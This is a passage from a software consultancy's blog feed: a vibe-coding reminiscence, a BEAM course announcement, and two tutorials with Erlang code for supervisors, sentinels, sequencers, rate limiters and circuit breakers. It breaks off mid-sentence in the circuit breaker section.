commit message that read &amp;quot;Add a ChatGPT connection,&amp;quot; an agent framework
in March. Four projects in eight weeks. I recognized the pattern
immediately: discover a new capability, start five things at once. The
C64 again.&lt;/p&gt;
&lt;p&gt;Then in June 2025, the third shift. I added a CLAUDE.md file to Solar
Frontiers, an Erlang game project that had been sitting at fourteen
commits over ten months.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/blog/solar-frontiers-interface.png&quot; alt=&quot;Solar Frontiers gameplay interface showing the solar system map, probes, and research controls&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Solar Frontiers. An Erlang-powered strategy game. Fourteen commits in ten months, then six hundred and fifteen after adding AI to the workflow.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Since then Solar Frontiers alone has accumulated more than six hundred
commits. It was not an exception. In nine months of vibe coding across
my projects, the numbers add up to nearly three thousand commits and more
than a million lines of code written, roughly eleven commits a day.&lt;/p&gt;
&lt;p&gt;On the C64 I might have written fifty lines in an evening and felt like I
had conquered the world. The scale changed. The rhythm is back.&lt;/p&gt;
&lt;p&gt;By early 2026, the project list looked like this: a life organizer, a home
dashboard running on a Raspberry Pi with Nerves, a weekly menu generator
that automatically orders groceries from Mathem, a kids&#39; chore controller,
a door controller for the house, Modbus integrations to the Nibe heat pump
and the FTX ventilation system, a voice pipeline prototype, a book library
app, LAN party tools for Unreal Tournament, a gaming monitor, a Discord
bot. Compare that to the C64 list: text adventures, M.U.L.E. clone, Elite
clone, turtle robot. Same pattern. Ambitious, broad, driven by curiosity.&lt;/p&gt;
&lt;p&gt;The difference is speed. On the C64 it took weeks to get sprites moving.
With AI tools you can have a working dashboard in an evening. The feeling
is the same.&lt;/p&gt;
&lt;h2 id=&quot;a-note-on-production&quot; tabindex=&quot;-1&quot;&gt;A note on production&lt;/h2&gt;
&lt;p&gt;I would not push vibe-coded software to a fintech production system today.
The quality is not there yet for high-stakes systems. But I believe the
improvements in AI capability have been exponential since the 1940s. The early part of an exponential
curve looks flat, and the flat part lasted long enough that several
generations of researchers concluded AI was permanently limited. The late
part looks vertical, and we are entering it now. That is a topic for
another post.&lt;/p&gt;
&lt;p&gt;There are also harder questions around AI-assisted development: training
data, copyright, security risks, and the occasional spectacular failure
when a model confidently deletes the wrong database. Those questions
deserve serious discussion. This essay is about something simpler: why
the machine suddenly feels interesting again.&lt;/p&gt;
&lt;h2 id=&quot;the-same-feeling&quot; tabindex=&quot;-1&quot;&gt;The same feeling&lt;/h2&gt;
&lt;p&gt;The turtle robot drew circles on paper. The door controller opens the
front door. Code reaching into the physical world, same feeling, forty
years apart. The unfinished M.U.L.E. clone and the ever-growing Aurora
life organizer. Same &amp;quot;I will just...&amp;quot; at ten in the evening. Same &amp;quot;school
in five hours&amp;quot; at three in the morning, except now it is &amp;quot;meeting in five
hours.&amp;quot;&lt;/p&gt;
&lt;p&gt;The thing that got me into programming is still here. It just needed a new
form. Even in Stockholm, in the winter, the darkness outside makes the
screen feel like the whole universe.&lt;/p&gt;
&lt;p&gt;Many years ago, in my PhD thesis, I quoted a line from a Dan Fogelberg
song:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;The days are empty and the nights are unreal.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
</content>
  </entry>
  
  <entry>
    <title>Why I Built a Course on the BEAM</title>
    <link href="https://happihacking.com/blog/posts/2026/why_I_built_a_course_on_the_beam/"/>
    <updated>2026-03-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/why_I_built_a_course_on_the_beam/</id>
    <summary>Understanding the runtime changes how you build on it.</summary>
    <content type="html">&lt;h1 id=&quot;why-i-built-a-course-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Why I Built a Course on the BEAM&lt;/h1&gt;
&lt;p&gt;Programming languages shape how we think. When the tool matches the
problem, work becomes calmer. You see the system more clearly, and you
spend less time fighting accidental complexity.&lt;/p&gt;
&lt;p&gt;That lesson is one reason I keep returning to the BEAM, the runtime behind Erlang and Elixir.&lt;/p&gt;
&lt;p&gt;At HappiHacking, we spend a lot of time on systems that need to stay
reliable, maintainable, and fast. In that kind of work, the BEAM keeps
proving its value. It gives you cheap processes, clear failure boundaries,
supervision, message passing, and a runtime designed for long-lived
systems. Those qualities matter when downtime is expensive and concurrency
is part of the job.&lt;/p&gt;
&lt;h2 id=&quot;many-teams-still-meet-the-beam-only-at-the-surface&quot; tabindex=&quot;-1&quot;&gt;Many Teams Still Meet the BEAM Only at the Surface&lt;/h2&gt;
&lt;p&gt;They learn enough Erlang or Elixir to ship features. They use OTP
behaviours, build services, and get real value quickly. Then the harder
questions arrive. A mailbox starts growing. Latency becomes uneven across
nodes. Memory behaves differently under real traffic. Recovery takes longer
than expected.&lt;/p&gt;
&lt;p&gt;That gap between using the BEAM and understanding the BEAM is where this
course lives.&lt;/p&gt;
&lt;h2 id=&quot;a-stronger-mental-model&quot; tabindex=&quot;-1&quot;&gt;A Stronger Mental Model&lt;/h2&gt;
&lt;p&gt;I built this course for developers who want a stronger mental model of the
runtime. The aim is simple: help you reason more clearly about why BEAM
systems behave as they do, and what to do when they do not behave the way
you expected.&lt;/p&gt;
&lt;p&gt;In the course, we look at schedulers, processes, mailboxes, memory
behaviour, garbage collection, messaging, and the failure modes that tend
to appear under real load. We also cover how to design concurrent systems
using &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;process archetypes&lt;/a&gt; and
the &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;Gnome Village&lt;/a&gt; metaphor, a
way of thinking about BEAM systems as small, specialized workers
cooperating in a shared environment.&lt;/p&gt;
&lt;p&gt;Better mental models usually lead to better designs, faster diagnosis, and
fewer avoidable surprises in production. You should leave with a clearer
way to inspect live systems, better instincts for what to measure, and a
firmer grasp of how to tune a system.&lt;/p&gt;
&lt;h2 id=&quot;who-this-course-is-for&quot; tabindex=&quot;-1&quot;&gt;Who This Course Is For&lt;/h2&gt;
&lt;p&gt;This course is especially useful for teams building backend systems where
reliability matters. Fintech is one obvious example, but it is not the only
one. Messaging systems, internal platforms, transactional services, and
other high-concurrency backends face many of the same pressures. If your
system needs to survive changing load and keep its shape over time, a
deeper understanding of the BEAM pays back quickly.&lt;/p&gt;
&lt;p&gt;I have spent much of my career working close to languages, runtimes, and
systems that need to keep working. My PhD focused on compiling Erlang.
Later I worked on Scala at EPFL. At Klarna, I joined early enough to help
shape both the system and the engineering organization as it grew. Across
those experiences, the pattern has been fairly consistent: performance
follows understanding, and reliable systems begin with the right mental
model.&lt;/p&gt;
&lt;p&gt;That is what this course is meant to provide.&lt;/p&gt;
&lt;p&gt;It is for developers who want to move beyond cargo-cult OTP. It is for
teams that want calmer operations, better debugging habits, and more
confidence when systems come under pressure. It is for people who suspect
that the BEAM has more to teach them than syntax and conventions.&lt;/p&gt;
&lt;h2 id=&quot;join-a-session&quot; tabindex=&quot;-1&quot;&gt;Join a Session&lt;/h2&gt;
&lt;p&gt;The next public session is at
&lt;a href=&quot;https://www.elixirconf.eu/#training&quot;&gt;ElixirConf EU in Malaga on April 22&lt;/a&gt;,
a full-day training the day before the conference. Early bird pricing ends
March 11.&lt;/p&gt;
&lt;p&gt;You can also book a private workshop for your team. For private training,
I can tailor the material to your architecture, your failure modes, and
the questions your team is already facing.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.elixirconf.eu/&quot;&gt;Register for ElixirConf EU&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://happihacking.com/contact/?subject=Private%20BEAM%20Workshop&quot;&gt;Book a private workshop&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Observers: The Watchful Gnomes of the Village</title>
    <link href="https://happihacking.com/blog/posts/2025/observers/"/>
    <updated>2025-12-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/observers/</id>
    <summary>Processes that watch, restart, and enforce lifetimes</summary>
    <content type="html">&lt;h1 id=&quot;observers-the-watchful-gnomes-of-the-village&quot; tabindex=&quot;-1&quot;&gt;Observers: The Watchful Gnomes of the Village&lt;/h1&gt;
&lt;p&gt;Some gnomes in the village don’t build bridges, bake bread, or carry mail.
They stand on a hill, hold a lantern, and keep an eye on everyone else.
When something goes wrong, they react. They don’t fix the problem
themselves—they simply make sure the right thing happens next.&lt;/p&gt;
&lt;p&gt;These are &lt;strong&gt;Observers&lt;/strong&gt;.
Their job is to keep the system healthy.&lt;/p&gt;
&lt;p&gt;Observers come in two useful forms: &lt;strong&gt;Sentinels&lt;/strong&gt; and &lt;strong&gt;Supervisors&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;sentinels&quot; tabindex=&quot;-1&quot;&gt;Sentinels&lt;/h1&gt;
&lt;p&gt;A Sentinel watches a process or a condition and acts when reality drifts
away from expectations. Timeouts, deadlines, stalled workers, mailbox
growth, missing responses—these are all things a Sentinel can detect.&lt;/p&gt;
&lt;h3 id=&quot;minimal-example&quot; tabindex=&quot;-1&quot;&gt;Minimal example&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info(check, #state{pid = Pid, threshold = N} = S) -&amp;gt;
    case process_info(Pid, message_queue_len) of
        {message_queue_len, Len} when Len &amp;gt; N -&amp;gt;
            %% Mailbox above threshold: raise the alarm
            S#state.alert_target ! {overload, Pid, Len};
        _ -&amp;gt;
            %% Below threshold, or the process is gone (undefined)
            ok
    end,
    %% Reschedule the next check
    erlang:send_after(1000, self(), check),
    {noreply, S}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A small loop, a single condition, and an alert.
That’s a Sentinel.&lt;/p&gt;
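&lt;p&gt;Starting the loop is the only other piece. A minimal sketch of
&lt;code&gt;init/1&lt;/code&gt;, assuming the same state fields as the example above:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;init([Pid, Threshold, AlertTarget]) -&amp;gt;
    %% Schedule the first check; handle_info/2 reschedules each tick
    erlang:send_after(1000, self(), check),
    {ok, #state{pid = Pid,
                threshold = Threshold,
                alert_target = AlertTarget}}.
&lt;/code&gt;&lt;/pre&gt;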
&lt;hr /&gt;
&lt;h1 id=&quot;supervisors&quot; tabindex=&quot;-1&quot;&gt;Supervisors&lt;/h1&gt;
&lt;p&gt;Supervisors are the managers of the gnome village. They don’t write code,
carry letters, or fix bridges. They make sure the gnomes who do those
things show up for work, behave themselves, and get replaced when they fall
into the river.&lt;/p&gt;
&lt;p&gt;A Supervisor enforces the structure of the system. It starts processes,
restarts them when they crash, and escalates when failures repeat. It is
the backbone of OTP fault-tolerance.&lt;/p&gt;
&lt;p&gt;Supervisors never do real work. They only make sure the workers are alive,
in the right teams, and following the rules. If a Supervisor starts doing
work, it has stopped being a manager and started being a liability.&lt;/p&gt;
&lt;h3 id=&quot;conceptual-example&quot; tabindex=&quot;-1&quot;&gt;Conceptual example&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;init([]) -&amp;gt;
    SupFlags = #{strategy =&amp;gt; one_for_one,
                 intensity =&amp;gt; 5,   %% at most 5 restarts...
                 period =&amp;gt; 10},    %% ...within 10 seconds
    ChildSpecs = [#{id =&amp;gt; worker1,
                    start =&amp;gt; {worker1, start_link, []},
                    restart =&amp;gt; permanent,
                    shutdown =&amp;gt; 5000,
                    type =&amp;gt; worker,
                    modules =&amp;gt; [worker1]}],
    {ok, {SupFlags, ChildSpecs}}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One rule: workers may fail. Supervisors may not.&lt;/p&gt;
&lt;p&gt;A supervisor can still terminate when its children fail too quickly and the
restart rules require escalation. That is intentional. It pushes failure
upward until it reaches a level that can handle it.&lt;/p&gt;
&lt;p&gt;But a supervisor should never fail because of its own code. It should have
no business logic, no parsing, no calculations, and nothing that can crash
by accident. Its job is to start children, restart them, and apply the
restart strategy.&lt;/p&gt;
&lt;p&gt;This separation is why large BEAM systems stay stable even when individual
processes fail repeatedly. Workers fail often. Supervisors fail only when
the failure belongs at their level.&lt;/p&gt;
&lt;p&gt;They keep the rest of the gnomes working without taking the whole village
down. When things really go wrong, they escalate the alarm cleanly and
predictably up the tree.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;the-observer-mindset&quot; tabindex=&quot;-1&quot;&gt;The Observer Mindset&lt;/h1&gt;
&lt;p&gt;Observers have a simple philosophy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Let processes run freely.&lt;/li&gt;
&lt;li&gt;Let them crash when they must.&lt;/li&gt;
&lt;li&gt;Notice when they do.&lt;/li&gt;
&lt;li&gt;Clean up, restart, or alert.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Observers are the safety rails of the system.&lt;/p&gt;
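&lt;p&gt;“Notice when they do” usually means a monitor. A small sketch of a
Sentinel reacting to a &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; message, assuming the same
&lt;code&gt;alert_target&lt;/code&gt; field as in the earlier example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Watch a process; the runtime will tell us when it dies
watch(Pid) -&amp;gt;
    erlang:monitor(process, Pid).

handle_info({&#39;DOWN&#39;, _Ref, process, Pid, Reason}, S) -&amp;gt;
    %% Don&#39;t fix anything here; make sure the right thing happens next
    S#state.alert_target ! {process_died, Pid, Reason},
    {noreply, S}.
&lt;/code&gt;&lt;/pre&gt;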
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Observers keep the system alive:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sentinels&lt;/strong&gt; watch and raise alerts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervisors&lt;/strong&gt; restart and maintain structure.&lt;/li&gt;
&lt;/ul&gt;
</content>
  </entry>
  
  <entry>
    <title>Gatekeepers: The Traffic Controllers of the Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/gatekeepers/"/>
    <updated>2025-12-08T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gatekeepers/</id>
    <summary>Processes that protect the system from the outside world, and from itself</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gatekeeper_4.png&quot; alt=&quot;The Gatekeeper Gnome&quot; title=&quot;The Gatekeeper Gnome&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;gatekeepers-the-traffic-controllers-of-the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers: The Traffic Controllers of the Gnome Village&lt;/h1&gt;
&lt;p&gt;In every gnome village you eventually discover a small, serious-looking
gnome standing on a bridge, holding a sign.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You Shall Not Pass!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;He is not there to forward messages. He is not there to do work.
He is there to &lt;strong&gt;limit how much chaos reaches the rest of the village&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;That gnome is the Gatekeeper.&lt;/p&gt;
&lt;p&gt;Gatekeepers control &lt;em&gt;flow&lt;/em&gt;: how fast, how often, and under what conditions
messages move into the next part of the system. They protect scarce
resources, absorb bursts, and stop cascading failures from spreading
downstream.&lt;/p&gt;
&lt;p&gt;A Gatekeeper is not a Router.&lt;/p&gt;
&lt;p&gt;A Gatekeeper is not a Worker.&lt;/p&gt;
&lt;p&gt;A Gatekeeper cares about &lt;strong&gt;when&lt;/strong&gt; something happens, not just &lt;strong&gt;where&lt;/strong&gt; it
goes.&lt;/p&gt;
&lt;p&gt;This post defines the Gatekeeper archetype, shows the common subtypes, and
explains how to use them without accidentally turning them into
bottlenecks.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-gatekeeper&quot; tabindex=&quot;-1&quot;&gt;What Is a Gatekeeper?&lt;/h1&gt;
&lt;p&gt;A Gatekeeper enforces one rule:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;“Not everything gets through. And not everything gets through at
once.”&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Where Workers do work and Routers forward messages, Gatekeepers &lt;strong&gt;regulate&lt;/strong&gt; traffic:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;They serialize or sequence flows.&lt;/li&gt;
&lt;li&gt;They protect slow or fragile subsystems.&lt;/li&gt;
&lt;li&gt;They turn unbounded input into bounded throughput.&lt;/li&gt;
&lt;li&gt;They absorb bursts and provide backpressure.&lt;/li&gt;
&lt;li&gt;They cut off failing downstream systems before everything collapses.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Gatekeeper owns &lt;em&gt;coordination&lt;/em&gt;, not domain state.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-gatekeepers-are-not&quot; tabindex=&quot;-1&quot;&gt;What Gatekeepers Are Not&lt;/h1&gt;
&lt;p&gt;To keep this archetype clean, two clarifications:&lt;/p&gt;
&lt;h3 id=&quot;not-a-router&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Not a Router&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gatekeepers do not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;decide destinations&lt;/li&gt;
&lt;li&gt;classify messages&lt;/li&gt;
&lt;li&gt;route between processes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Router shapes &lt;strong&gt;direction&lt;/strong&gt;.
A Gatekeeper shapes &lt;strong&gt;rate and order&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id=&quot;not-a-resource-owner&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Not a Resource Owner&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gatekeepers do not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;store domain data&lt;/li&gt;
&lt;li&gt;own sessions or connections&lt;/li&gt;
&lt;li&gt;maintain business invariants&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Resource Owner holds state.
A Gatekeeper holds &lt;strong&gt;flow control&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeeper-subtypes&quot; tabindex=&quot;-1&quot;&gt;Gatekeeper Subtypes&lt;/h1&gt;
&lt;p&gt;Gatekeepers appear in three main forms. Every one of them exists to prevent
a subsystem from being overloaded or corrupted by timing.&lt;/p&gt;
&lt;h2 id=&quot;1-flow-controller&quot; tabindex=&quot;-1&quot;&gt;1. Flow Controller&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;also called Sequencer or Coordinator&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ensures only one message at a time enters a subsystem. Useful when the
target must process tasks in strict order or must not have concurrent
invocations.&lt;/p&gt;
&lt;p&gt;Sometimes “one at a time” is not enough. You also need &lt;strong&gt;in-order
delivery&lt;/strong&gt;, even if messages arrive out of order.&lt;/p&gt;
&lt;p&gt;A Sequencer Gatekeeper works a bit like TCP:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;each message carries a &lt;strong&gt;sequence number&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;the Sequencer keeps track of the &lt;strong&gt;next expected&lt;/strong&gt; number,&lt;/li&gt;
&lt;li&gt;out-of-order messages are &lt;strong&gt;buffered&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;only in-order messages are forwarded.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Gatekeeper does not do the work. It only decides &lt;strong&gt;when&lt;/strong&gt; a message is
allowed to move on.&lt;/p&gt;
&lt;p&gt;Here is a minimal, slightly contrived example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% sequencer.erl
-record(state, {
    next_seq   = 0,   %% next expected sequence number
    pending    = #{}, %% #{Seq =&amp;gt; Msg}
    downstream        %% pid() of the real worker
}).

%% Public API: send a sequenced message
send(Pid, Seq, Msg) -&amp;gt;
    gen_server:cast(Pid, {seq, Seq, Msg}).

%% Callbacks

handle_cast({seq, Seq, Msg}, #state{pending = Pending} = S) -&amp;gt;
    %% Buffer the message, then flush everything that is now in order
    S1 = S#state{pending = maps:put(Seq, Msg, Pending)},
    {noreply, flush_in_order(S1)}.

flush_in_order(#state{next_seq = Next,
                      pending  = Pending,
                      downstream = Down} = S) -&amp;gt;
    case maps:take(Next, Pending) of
        {Msg, Pending1} -&amp;gt;
            %% We have the next message, forward it
            gen_server:cast(Down, {ordered, Next, Msg}),
            flush_in_order(S#state{next_seq = Next + 1,
                                   pending  = Pending1});
        error -&amp;gt;
            %% Missing message; stop here and wait
            S
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This Sequencer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;accepts &lt;code&gt;{Seq, Msg}&lt;/code&gt; in any order,&lt;/li&gt;
&lt;li&gt;forwards them to &lt;code&gt;Down&lt;/code&gt; in &lt;strong&gt;strict sequence order&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;buffers anything that arrives early,&lt;/li&gt;
&lt;li&gt;never touches the domain logic of &lt;code&gt;Msg&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, the Sequencer is a tiny user-space TCP: it uses sequence
numbers and a buffer to guarantee ordered delivery, without doing the work
itself.&lt;/p&gt;
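&lt;p&gt;Usage is order-independent by design. A sketch, assuming the Sequencer
is registered under the hypothetical name &lt;code&gt;seq&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% 1 and 2 arrive early and are buffered; once 0 arrives,
%% all three are forwarded downstream in order: 0, 1, 2.
sequencer:send(seq, 1, b),
sequencer:send(seq, 2, c),
sequencer:send(seq, 0, a).
&lt;/code&gt;&lt;/pre&gt;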
&lt;hr /&gt;
&lt;h2 id=&quot;2-rate-limiter&quot; tabindex=&quot;-1&quot;&gt;2. Rate Limiter&lt;/h2&gt;
&lt;p&gt;Controls &lt;strong&gt;how often&lt;/strong&gt; something happens.&lt;/p&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“Max 100 requests per second to this PSP”&lt;/li&gt;
&lt;li&gt;“Only 5 ledger writes per second per user”&lt;/li&gt;
&lt;li&gt;“Batch up to N messages before flushing”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Rate limiters create backpressure:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If upstream is too fast → they wait or reject.&lt;/li&gt;
&lt;li&gt;If downstream is slow → they smooth the load.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Typical pattern:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(state, {
    tokens,
    max_tokens,
    refill_ms
}).

%% gen_server init/1: start by scheduling the first refill
init([MaxTokens, RefillMs]) -&amp;gt;
    erlang:send_after(RefillMs, self(), refill),
    {ok, #state{tokens = MaxTokens,
                max_tokens = MaxTokens,
                refill_ms = RefillMs}}.


%% A simple token bucket
handle_call({request, Msg}, _From, #state{tokens = T} = S) when T &amp;gt; 0 -&amp;gt;
    Next = S#state{tokens = T - 1},
    forward(Msg),  %% forward/1 hands Msg to the protected subsystem (not shown)
    {reply, ok, Next};

handle_call({request, _Msg}, _From, S) -&amp;gt;
    {reply, {error, rate_limited}, S}.

%% Refill on each tick
handle_info(refill, #state{max_tokens = Max, refill_ms = Ms} = S) -&amp;gt;
    %% Reset token count
    S1 = S#state{tokens = Max},

    %% Schedule next refill
    erlang:send_after(Ms, self(), refill),

    {noreply, S1}.

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Gatekeepers don’t try to be “helpful.” They enforce limits.&lt;/p&gt;
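&lt;p&gt;On the caller side, the limit shows up as an explicit error rather than
a silently growing queue. A sketch, assuming the limiter runs as a
registered gen_server named &lt;code&gt;limiter&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;submit(Msg) -&amp;gt;
    case gen_server:call(limiter, {request, Msg}) of
        ok -&amp;gt;
            ok;  %% forwarded downstream
        {error, rate_limited} -&amp;gt;
            %% Push the problem upstream: retry later or reject
            {error, try_again_later}
    end.
&lt;/code&gt;&lt;/pre&gt;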
&lt;hr /&gt;
&lt;h2 id=&quot;3-circuit-breaker&quot; tabindex=&quot;-1&quot;&gt;3. Circuit Breaker&lt;/h2&gt;
&lt;p&gt;A Circuit Breaker is the gnome who says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“We tried this four times and it exploded every time.
Maybe let’s not.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A Circuit Breaker stops calls to a subsystem that is failing and only
retries after a cooldown.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;About the Words “Open” and “Closed”&lt;/p&gt;
&lt;p&gt;The term circuit breaker comes from electricity.
Unfortunately the metaphor brings its vocabulary with it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;open → no current flows → no calls allowed&lt;/li&gt;
&lt;li&gt;closed → current flows → calls allowed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My little brain finds this backwards for software.
“Open” sounds like things should pass through.
“Closed” sounds like nothing should.&lt;/p&gt;
&lt;p&gt;To avoid confusing myself, I use passing
(calls allowed) and blocked (calls rejected).
If you prefer open and closed, that’s fine, just be careful.
The metaphor is older and stronger than you think,
and it tends to drag its meaning along with it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(state, {
    mode           = passing,   %% passing | blocked
    failures       = 0,
    threshold      = 3,         %% failures before blocking
    backoff_ms     = 1000,      %% current backoff
    min_backoff_ms = 1000,
    max_backoff_ms = 30000,
    retry_at_ms    = 0,         %% monotonic time in ms
    target,                     %% pid() or {Mod, Fun} etc
    call_timeout   = 5000       %% ms
}).

%% Public API
%% A guarded call through the breaker
call(Pid, Request) -&amp;gt;
    gen_server:call(Pid, {call, Request}).
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_call({call, Request}, _From, S0) -&amp;gt;
    Now = now_ms(),
    case S0#state.mode of
        passing -&amp;gt;
            do_checked_call(Request, S0, Now);

        blocked -&amp;gt;
            case Now &amp;gt;= S0#state.retry_at_ms of
                false -&amp;gt;
                    %% Still blocked, do not hit downstream at all
                    {reply, {error, breaker_blocked}, S0};
                true -&amp;gt;
                    %% Retry window has opened: allow one trial call
                    do_checked_call(Request, S0, Now)
            end
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;now_ms() -&amp;gt;
    erlang:monotonic_time(millisecond).
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;do_checked_call(Request, S0, Now) -&amp;gt;
    case safe_call(S0#state.target, Request, S0#state.call_timeout) of
        {ok, Result} -&amp;gt;
            %% Success: reset failures, mode, and backoff
            S1 = S0#state{
                mode        = passing,
                failures    = 0,
                backoff_ms  = S0#state.min_backoff_ms,
                retry_at_ms = 0
            },
            {reply, {ok, Result}, S1};

        {error, Reason} -&amp;gt;
            handle_failure(Reason, S0, Now)
    end.

&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;safe_call(Target, Request, Timeout) when is_pid(Target) -&amp;gt;
    try gen_server:call(Target, Request, Timeout) of
        Reply -&amp;gt; {ok, Reply}
    catch
        Class:Error -&amp;gt;
            {error, {Class, Error}}
    end;
safe_call({M, F}, Request, Timeout) -&amp;gt;
    %% or whatever abstraction you like
    try M:F(Request, Timeout) of
        Reply -&amp;gt; {ok, Reply}
    catch
        Class:Error -&amp;gt;
            {error, {Class, Error}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_failure(Reason, S0, Now) -&amp;gt;
    Fail1 = S0#state.failures + 1,
    case Fail1 &amp;gt;= S0#state.threshold of
        false -&amp;gt;
            %% Below threshold: still passing, but report failure
            S1 = S0#state{failures = Fail1},
            {reply, {error, {downstream_failed, Reason}}, S1};

        true -&amp;gt;
            %% Threshold reached: switch to blocked and back off
            Backoff0 = S0#state.backoff_ms,
            Max      = S0#state.max_backoff_ms,
            Backoff1 = min(Backoff0 * 2, Max),
            RetryAt  = Now + Backoff1,
            S1 = S0#state{
                mode        = blocked,
                failures    = Fail1,
                backoff_ms  = Backoff1,
                retry_at_ms = RetryAt
            },
            {reply, {error, {downstream_failed,
                             Reason, breaker_blocked}}, S1}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We use exponential backoff with a cap: the backoff doubles each time the
breaker trips and never exceeds max_backoff_ms. On the first success after
a failure streak, we reset the backoff to min_backoff_ms.&lt;/p&gt;
&lt;p&gt;The behaviour in plain words:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;While things work: &lt;code&gt;mode = passing&lt;/code&gt;, all calls go through,
and the failure count resets to 0.&lt;/li&gt;
&lt;li&gt;When failures pile up (≥ threshold): the breaker enters
&lt;code&gt;mode = blocked&lt;/code&gt;, sets &lt;code&gt;retry_at_ms&lt;/code&gt; to now plus the
